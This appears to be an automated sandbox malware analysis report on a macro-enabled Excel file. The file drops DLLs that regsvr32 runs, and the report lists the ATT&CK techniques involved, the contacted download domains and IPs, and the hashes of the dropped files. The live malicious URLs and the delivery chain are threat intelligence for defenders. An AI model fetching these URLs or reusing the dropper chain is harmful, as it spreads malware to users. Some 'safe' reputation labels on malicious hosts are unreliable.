        Source: Yara match File source: 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match File source: 00000006.00000002.2118665965.00000000002F7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2102390531.0000000000329000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2102412669.0000000000347000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000006.00000002.2120636157.0000000003090000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2808, type: MEMORY
        Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2996, type: MEMORY
        Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 3068, type: MEMORY

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Exploitation for Client Execution 43 | Path Interception | Process Injection 11 | Masquerading 121 | OS Credential Dumping | Security Software Discovery 211 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 11 | Security Account Manager | Account Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Regsvr32 1 | NTDS | System Owner/User Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 124 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Network Configuration Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 22 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

        Behavior Graph

        [Behavior graph (image not reproduced): ID 444703, sample sbf0127365-7431059.xlsm, start date 06/07/2021, architecture WINDOWS, score 100. EXCEL.EXE dropped C:\Users\user\XRAY.dll, C:\Users\user\XTOWN.dll and C:\Users\user\XZIBIT.dll (PE32+) plus 3 other malicious files, and started three regsvr32.exe processes.]

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        Source | Detection | Scanner | Label | Link
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe |
        http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe |
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom | 0% | URL Reputation | safe |
        http://ocsp.rootg2.amazontrust.com08 | 0% | URL Reputation | safe |
        https://www.buzzsprout.com; | 0% | Avira URL Cloud | safe |
        http://voopeople.fun/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe |
        http://crl.sca1b.amazontrust.com/sca1b.crl0 | 0% | URL Reputation | safe |
        http://astrocycle.download/ | 0% | Avira URL Cloud | safe |
        http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe |
        http://ocsp.sca1b.amazontrust.com06 | 0% | URL Reputation | safe |
        http://crt.rootg2.amazontrust.com/root | 0% | Avira URL Cloud | safe |
        http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe |
        http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe |
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe |
        https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1Z10NXV9YPC16ZYC023HEX-Content-Ty | 0% | Avira URL Cloud | safe |
        http://astrocycle.download/Q5ZDkxZT | 0% | Avira URL Cloud | safe |
        http://crl.rootg2.amazontrust.com/rootg2.crl0 | 0% | URL Reputation | safe |
        http://uppercilio.fun/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe |
        http://o.ss2.us/0 | 0% | URL Reputation | safe |
        https://prod-us-west-2.csp-report.marketing.aws.dev/submit | 0% | Avira URL Cloud | safe |
        http://thousandsyears.download/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe |
        https://amazonwebservices.d2.sc.omtrdc.net | 0% | Avira URL Cloud | safe |

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        uppercilio.fun | 104.21.55.83 | true | false | | unknown
        thousandsyears.download | 172.67.198.51 | true | false | | unknown
        voopeople.fun | 104.21.12.122 | true | false | | unknown
        astrocycle.download | 172.67.213.115 | true | true | | unknown
        dr49lng3n1n2s.cloudfront.net | 13.224.92.73 | true | false | | high
        aws.amazon.com | unknown | unknown | false | | high

        Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        http://voopeople.fun/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown
        http://astrocycle.download/ | true | Avira URL Cloud: safe | unknown
        http://uppercilio.fun/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown
        http://thousandsyears.download/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown

        URLs from Memory and Binaries

        Name | Source | Malicious | Antivirus Detection | Reputation
                                                                            high
                                                                            https://a0.awsstatic.com/libra-css/images/site/fav/favicon.icoregsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              https://aws.amazon.com/es/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://crl.sca1b.amazontrust.com/sca1b.crl0regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://d1le29qyzha1u4.cloudfront.netregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://docs.aws.amazon.com/index.html?nc2=h_ql_docregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://aws.amazon.com/ar/?nc1=h_lsregsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2102507557.0000000001DA0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109819947.0000000001D10000.00000002.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      low
                                                                                      https://p.adsymptotic.comregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://aws.amazon.com/th/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://docs.aws.amazon.comregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.windows.com/pctv.regsvr32.exe, 00000003.00000002.2105066388.00000000030F0000.00000002.00000001.sdmpfalse
                                                                                              high
                                                                                              https://a0.awsstatic.com/pricing-calculator/js/1.0.2regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://a0.awsstatic.com/plc/js/1.0.112/plcregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://aws.amazon.com/marketplace/?nc2=h_moregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://d2a6igt6jhaluh.cloudfront.netregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://ocsp.sca1b.amazontrust.com06regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://amazon.com/regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpfalse
                                                                                                        high
                                                                                                        https://amazon.com/4Iregsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.pngregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://console.aws.amazon.com/support/home/?nc2=h_ql_curegsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://crt.rootg2.amazontrust.com/rootregsvr32.exe, 00000003.00000003.2098034519.000000000032C000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0regsvr32.exe, 00000003.00000003.2098034519.000000000032C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://aws.amazon.com/search/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credentialregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://aws.amazon.com/?nc2=h_lgregsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://ocsp.rootca1.amazontrust.com0:regsvr32.exe, 00000003.00000003.2098034519.000000000032C000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://console.aws.amazon.com/support/home/?nc1=f_drregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://aws.amazon.com/fr/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000003.00000002.2105380769.00000000032D7000.00000002.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobileregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1Z10NXV9YPC16ZYC023HEX-Content-Tyregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://aws.amazon.com/vi/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://mktg-apac.s3-ap-southeast-1.amazonaws.comregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://www.twitch.tv/awsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://astrocycle.download/Q5ZDkxZTregsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://aws.amazon.com/marketplace/?nc2=h_ql_mpregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://aws.amazon.com/searchregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://a0.awsstatic.com/libra/1.0.385/libra-head.jsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://crl.rootg2.amazontrust.com/rootg2.crl0regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109583680.0000000000220000.00000004.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.2103638650.0000000002D00000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2114595132.0000000002CB0000.00000002.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://d36cz9buwru1tt.cloudfront.netregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://a0.awsstatic.com/da/js/1.0.47/aws-da.jsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://aws.amazon.com/tw/regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://aws.amazon.com/tr/?nc1=h_lsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://console.aws.amazon.com/?nc2=h_m_mcregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://aws.amazon.com/fr/?nc1=h_lsregsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://awsmedia.s3.amazonaws.comregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://o.ss2.us/0regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109583680.0000000000220000.00000004.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://aws.amazon.com/search/?searchQuery=regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://a0.awsstatic.com/libra-search/1.0.13/jsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://aws.amazon.com/privacy/?nc1=f_prregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://aws.amazon.com/pt/?nc1=h_lsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://prod-us-west-2.csp-report.marketing.aws.dev/submitregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://aws.amazon.com/jp/?nc1=h_lsregsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://aws.amazon.com/regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://d3ctxlq1ktw2nl.cloudfront.netregsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpfalse

Contacted IPs

Public

IP              Domain                        Country        ASN    ASN Name         Malicious
172.67.198.51   thousandsyears.download       United States  13335  CLOUDFLARENETUS  false
13.224.92.73    dr49lng3n1n2s.cloudfront.net  United States  16509  AMAZON-02US      false
104.21.55.83    uppercilio.fun                United States  13335  CLOUDFLARENETUS  false
172.67.213.115  astrocycle.download           United States  13335  CLOUDFLARENETUS  true
104.21.12.122   voopeople.fun                 United States  13335  CLOUDFLARENETUS  false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 444703
Start date: 06.07.2021
Start time: 15:33:19
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 45s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: sbf0127365-7431059.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSM@7/8@15/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 73.6% (good quality ratio 60.1%)
• Quality average: 72.6%
• Quality standard deviation: 39.3%
HCA Information:
• Successful, ratio: 71%
• Number of executed functions: 28
• Number of non-executed functions: 3
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs


Domains

                                                                                                                                                                                      DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.198.51
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.198.51
                                                                                                                                                                                      uppercilio.funOutfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.55.83
                                                                                                                                                                                      Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.55.83
                                                                                                                                                                                      DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.55.83
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.55.83
                                                                                                                                                                                      voopeople.funOutfordelivery799862.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      Purchaseconfirmation-137606.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      DeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117

                                                                                                                                                                                      ASN


                                                                                                                                                                                      JA3 Fingerprints


Dropped Files

Match: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
• Associated Sample Name / URL: Outfordelivery799862.xlsm, Detection: malicious
• Associated Sample Name / URL: Purchaseconfirmation-137606.xlsm, Detection: malicious
• Associated Sample Name / URL: DeliveryConf535215.xlsm, Detection: malicious
• Associated Sample Name / URL: PI-210610.xlsm, Detection: malicious

Match: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml
• Associated Sample Name / URL: Outfordelivery799862.xlsm, Detection: malicious
• Associated Sample Name / URL: Purchaseconfirmation-137606.xlsm, Detection: malicious
• Associated Sample Name / URL: DeliveryConf535215.xlsm, Detection: malicious
• Associated Sample Name / URL: PI-210610.xlsm, Detection: malicious

Match: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml
• Associated Sample Name / URL: Outfordelivery799862.xlsm, Detection: malicious
• Associated Sample Name / URL: Purchaseconfirmation-137606.xlsm, Detection: malicious
• Associated Sample Name / URL: DeliveryConf535215.xlsm, Detection: malicious
• Associated Sample Name / URL: PI-210610.xlsm, Detection: malicious

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32+ executable (DLL) (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 57856
Entropy (8bit): 4.963425128586394
Encrypted: false
SSDEEP: 768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5: 7A1D163990ACE9CEF1D43831866109AB
SHA1: 38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256: 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512: 454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious: true
Joe Sandbox View:
• Filename: Outfordelivery799862.xlsm, Detection: malicious
• Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious
• Filename: DeliveryConf535215.xlsm, Detection: malicious
• Filename: PI-210610.xlsm, Detection: malicious
Reputation: low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32+ executable (DLL) (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 57856
Entropy (8bit): 4.963425128586394
Encrypted: false
SSDEEP: 768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5: 7A1D163990ACE9CEF1D43831866109AB
SHA1: 38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256: 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512: 454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious: true
Joe Sandbox View:
• Filename: Outfordelivery799862.xlsm, Detection: malicious
• Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious
• Filename: DeliveryConf535215.xlsm, Detection: malicious
• Filename: PI-210610.xlsm, Detection: malicious
Reputation: low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PE32+ executable (DLL) (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 57856
Entropy (8bit): 4.963425128586394
Encrypted: false
SSDEEP: 768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
MD5: 7A1D163990ACE9CEF1D43831866109AB
SHA1: 38A40E5AF9912C2935F74F2085D810A24325DC2A
SHA-256: 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
SHA-512: 454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
Malicious: true
Joe Sandbox View:
• Filename: Outfordelivery799862.xlsm, Detection: malicious
• Filename: Purchaseconfirmation-137606.xlsm, Detection: malicious
• Filename: DeliveryConf535215.xlsm, Detection: malicious
• Filename: PI-210610.xlsm, Detection: malicious
Reputation: low

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BDBE85F.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
Category: dropped
Size (bytes): 174009
Entropy (8bit): 7.967231122944825
Encrypted: false
SSDEEP: 3072:4DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/XO:CRcGUlFzy4mpTHdrUc3/SsYASj
